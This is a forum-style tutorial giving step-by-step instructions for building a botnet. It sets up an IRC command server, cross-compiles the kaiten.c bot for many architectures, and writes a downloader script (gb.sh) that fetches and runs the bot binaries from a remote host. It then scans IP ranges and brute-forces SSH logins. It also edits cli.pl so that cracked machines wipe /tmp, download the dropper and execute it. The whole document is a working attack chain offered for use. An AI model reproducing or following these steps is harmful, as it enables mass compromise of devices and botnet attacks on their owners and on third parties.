HOW TO SETUP LRAB AND UNREAL

HOW TO SETUP LRAB AND UNREAL

COMPLETE LRAB AND UNREAL SETUP GUIDE BY NRPE :) WILL NEED 1 or 2 SERVER FOR THIS HMU ON KIK-ableton

UNREAL SETUP WITH SOME DOWNLOADS FOR LRAB SO MAKE SURE TO DOWNLOAD ALL THIS STUFF EVEN IF YOU ALREADY HAVE AN IRC SETUP ALSO FOR NOTE IF YOU WANT CNC INSTEAD OF IRC FOLLOW THROUGH TUT BUT REPLACE KAITEN.C WITH CLIENT.C ITS SAME CONCEPT

apt-get install libssl-dev

apt-get install make gcc nano tar wget unzip perl

yum install openssl-devel

yum install make gcc nano tar wget unzip perl

wget https://www.unrealircd.org/unrealircd4/unrealircd-4.0.5.tar.gz 

tar -zxvf unrealircd-4.0.5.tar.gz 

cd unrealircd-4.0.5

./Config (hit enter a million times)

make

make install

cd unrealircd/conf/examples

nano example.conf (edit and save as unrealircd.conf)

mv unrealircd.conf /root/unrealircd/conf

cd ..

./unrealircd start

LRAB SETUP NOW!

First step is to change Max ssh connections so you don't get capped 

Type nano /etc/sshd_config or nano /etc/ssh/sshd_config

Press ctrl-w and search MaxStartups change it to like 20000 or something higher type ctrl-o save it and exit with ctrl-x now type 

service sshd restart (Centos) or 

sudo /etc/init.d/ssh restart (Debian/Ubuntu)

Now it's time to install Apache

Centos-u need to install httpd(apache) so type 

sudo yum install httpd 

once installed type 

sudo /usr/sbin/apachectl start

Ubuntu/debian- sudo apt-get install apache2 and then after it installs type sudo /etc/init.d/apache2 start

you should get this message from either distro if successful 

"Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using (your server ip) for ServerName" 

after installing and running apache you want to download these few things make sure your in root directory if unsure type cd /root 

now type the following commands 

wget http://www.zonesec.org/LRAB.zip

 

unzip LRAB.zip

that will unzip LRAB and make the directory 

now you need to download & configure your kaiten.c to your IRC, kaiten.c can be found here don't wget this link use web browser 

http://pastebin.com/bdGTV2zp

Go to link click raw copy the whole kaiten script go back to server type nano kaiten.c then right click/paste then type ctrl-o enter and ctrl-x

 

once you have it configured type mv kaiten.c /var/www/html

Next you want to cd into LRAB and type mkdir bin then you want to cd into bin(cd bin) and type nano s.sh and copy this 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2 && tar -xvjf cross-compiler-x86_64.tar.bz2 && rm -rf cross-compiler-x86_64.tar.bz2 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 && tar -xvjf cross-compiler-armv4l.tar.bz2 && rm -rf cross-compiler-armv4l.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2 && tar -xvjf cross-compiler-i686.tar.bz2 && rm -rf cross-compiler-i686.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 && tar -xvjf cross-compiler-armv5l.tar.bz2 && rm -rf cross-compiler-armv5l.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 && tar -xvjf cross-compiler-i586.tar.bz2 && rm -rf cross-compiler-i586.tar.bz2 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 && tar -xvjf cross-compiler-m68k.tar.bz2 && rm -rf cross-compiler-m68k.tar.bz2 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 && tar -xvjf cross-compiler-mips.tar.bz2 && rm -rf cross-compiler-mips.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 && tar -xvjf cross-compiler-mipsel.tar.bz2 && rm -rf cross-compiler-mipsel.tar.bz2 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc-440fp.tar.bz2 && tar -xvjf cross-compiler-powerpc-440fp.tar.bz2 && rm -rf cross-compiler-powerpc-440fp.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 && tar -xvjf cross-compiler-powerpc.tar.bz2 && rm -rf cross-compiler-powerpc.tar.bz2 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 && tar -xvjf cross-compiler-sh4.tar.bz2 && rm -rf cross-compiler-sh4.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 && tar -xvjf cross-compiler-sparc.tar.bz2 && rm -rf cross-compiler-sparc.tar.bz2

once you have pasted that you then want to save it and type chmod 777 * and then type sh s.sh then let it do its thing 

Now your going to want to type cd /root/LRAB/bin after that your going to want to cd into every cross compiler and compile it with kaiten.c example shown below you can also cross compile it with client.c for cnc it's same concept just have to follow how to edit that it's not hard but I'm

Not putting it in this tutorial anyways...

** Example for IRC/kaiten way **

* NOTE for this part sometimes typing the gcc it will give an error if it does that copy and paste the gcc file example powerpc-440fp-gcc

cd cross-compiler-powerpc440fp/bin

wget http://1.1.1.1/kaiten.c 

./powerpc-440fp-gcc -o ppc440 kaiten.c

mv mipsel /var/www/html

** Example for CNC/client way **

cd cross-compiler-powerpc440fp/bin

wget http://1.1.1.1/client.c

./powerpc-440fp-gcc -o ppc440 client.c -lpthread

mv mipsel /var/www/html

NOTE-make sure when cross compiling the file you name it to matches the ones in the wget link below!

do this exact step with each one make sure you doing the whatever-gcc file! its annoying but rewarding at the end :) also remember you can always type cd .. to go back a directory!

So now you want to type cd /var/www/html and then type nano gb.sh and then edit and copy this 

#!/bin/sh

wget -c http://1.1.1.1/armv5l -P /var/run && chmod +x /var/run/armv5l && /var/run/armv5l

wget -c http://1.1.1.1/mips -P /var/run && chmod +x /var/run/mips && /var/run/mips

wget -c http://1.1.1.1/mipsel -P /var/run && chmod +x /var/run/mipsel && /var/run/mipsel

wget -c http://1.1.1.1/ppc -P /var/run && chmod +x /var/run/ppc && /var/run/ppc

wget -c http://1.1.1.1/sh4 -P /var/run && chmod +x /var/run/sh4 && /var/run/sh4

wget -c http://1.1.1.1/x86_64 -P /var/run && chmod +x /var/run/x86_64 && /var/run/x86_64 

wget -c http://1.1.1.1/armv41 -P /var/run && chmod +x /var/run/armv41 && /var/run/armv41

wget -c http://1.1.1.1/i586 -P /var/run && chmod +x /var/run/i586 && /var/run/i586

wget -c http://1.1.1.1/i686 -P /var/run && chmod +x /var/run/i686 && /var/run/i686

wget -c http://1.1.1.1/ppc440 -P /var/run && chmod +x /var/run/ppc440 && /var/run/ppc440

wget -c http://1.1.1.1/m68k -P /var/run && chmod +x /var/run/m68k && /var/run/m68k

wget -c http://1.1.1.1/sparc -P /var/run && chmod +x /var/run/sparc && /var/run/sparc

sleep 3;

rm -fr /var/run/gb.sh

After that you want to save it and type chmod 777 * 

now for the next step 

apt-get install build-essential libssh2-1-dev

apt-get install php5-dev

apt-get install php-pear

cpan -i IO::Socket

cpan -i IO::Select 

cpan -i Parallel::ForkManager

cpan -i Net::SSH2

** if it says " No makefile was created " after you tried to install net:ssh2 **

do all of these commands in order one after another ONLY if you got the no makefile error if you didn't get error skip to cli.pl part

yum install php-devel php-pear libssh2 libssh2-devel

pecl install -f ssh2

touch /etc/php.d/ssh2.ini

echo extension=ssh2.so > /etc/php.d/ssh2.ini

after that run cpan -i Net::SSH2 again and it should work

now in your cli.pl file your going to look for this  

$channel->exec('rm -rf /tmp/*; wget -q http://176.123.7.39/jsf.sh -O /tmp/jsf.sh; sh /tmp/jsf.sh; rm -rf /tmp/*.sh'); 

once you have changed it it should look like this 

$channel->exec('rm -rf /tmp/*; wget -q http://1.1.1.1/gb.sh -O /tmp/gb.sh; sh /tmp/gb.sh; rm -rf /tmp/*.sh'); 

ok now your done with that your gonna want to scan for ip lists so now you want to do this

./class PORT -a IP -i INTERFACE -s 10

example- ./class 22 -a 192 -i eth0 -s 10 

NOTE- if it says you dont have permission just type chmod 777 * and rerun it and you should be all good just do that one time

if your unsure of what interface your on type ifconfig (usually is eth0)

okay now after the scan is done it creates a file named bios.txt with the ips from the scan

now you want to type nano bios.txt and type CTRL-o and rename it to mfu.txt press y for yes to save it as new name then CTRL-x to exit

okay just to make sure type ls and make sure theres bios.txt and mfu.txt and also double check to make sure it saved properly and the ips you scanned are there nano mfu.txt make sure same amount of ips are in there before next step!

once thats done scanning your range and youve edited the txt files you want to type

./update 1000

wait till its done bruteforcing (takes a while so be pateint also will stop randomly but just let it do its thing unlless its just simply froze it can take many hours so its wise to let it run its course) or you can manually stop it with CTRL+C

the end result will give you a new file called vuln.txt 

now you want to nano into cli.pl and look for this  

open(fh,'<',$file); @newarray; while (<fh>){ @array = split(':',$_);

end result after editing should look like this 

open(fh,'<','vuln.txt'); @newarray; while (<fh>){ @array = split(':',$_);

now type perl cli.pl and and let that do its thing and the bots will join your irc chan :)

now you are a certified 1337 hax0r b0t L0rd congrats!

~nrpe

Learn More :

Share this

Share on FacebookPlus on Google+